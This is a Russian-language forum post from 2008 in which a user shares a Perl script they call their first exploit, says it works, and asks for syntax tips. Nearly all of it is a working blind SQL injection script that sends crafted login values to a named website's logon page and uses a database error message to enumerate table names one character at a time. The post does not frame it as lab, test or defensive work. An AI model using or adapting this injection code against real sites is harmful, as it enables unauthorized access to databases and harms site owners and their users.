23.06.2008, 10:03
|
|
Познающий
Регистрация: 22.04.2008
Сообщений: 32
С нами:
9501269
Репутация:
56
|
|
Подскажите плиз!
Написал свой первый скрипт-exploit на перле, подскажите, как правильнее\лучше написать с точки зрения синтаксиса?
Скрипт рабочий.
Код:
#!/usr/bin/perl
use LWP;
my $browser = LWP::UserAgent->new;
my $url = "http://e-rfo.ru/?i=logon";
print "Starting sql-code injection...\n";
&GetTables('',0,0,'');
sub GetTables{
my ($ascii_set,$tnl, $node, $tn);
$ascii_set = $_[0];
$tnl = $_[1];
$node = $_[2];
$tn= $_[3];
my $curr_tnl = $tnl+1;
my $curr_tn = '';
my $curr_set = '';
my $curr_node = $node+1;
my $table_finded = 0;
for $i (95..122)
{
if (length($tn) == 0)
{
$curr_tn = chr($i);
}
else
{
$curr_tn = "$tn" .chr($i);
}
if (length($ascii_set) == 0)
{
$curr_set = $i;
}
else
{
$curr_set = $ascii_set.','.$i;
}
$char = 'CHAR('.$curr_set.')';
$post = "admin' AND 1=(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE LEFT(TABLE_NAME,$curr_tnl)=$char UNION ALL SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE LEFT(TABLE_NAME,$curr_tnl)=$char)/*";
$response = $browser->post($url, ['login' => $post, 'password' => '', 'op' => 'login']);
$content = $response->content;
if ($content =~ "Subquery returns more than 1 row")
{
print "LEFT(TABLE_NAME,$curr_tnl) is: ",$curr_tn,"\n";
$table_finded = 1;
GetTables($curr_set, $curr_tnl, $curr_node, $curr_tn);
if ($curr_node > 5)
{
return;
}
}
else
{
if (length($curr_tn) > 1 && $table_finded == 0 && $i == 122)
{
print "Table name is: " .substr($curr_tn,0,length($curr_tn)-1)."\n";
}
}
if ($response->is_success == false)
{
print "connection error...\n";
}
$curr_set = '';
}
}
|
|
|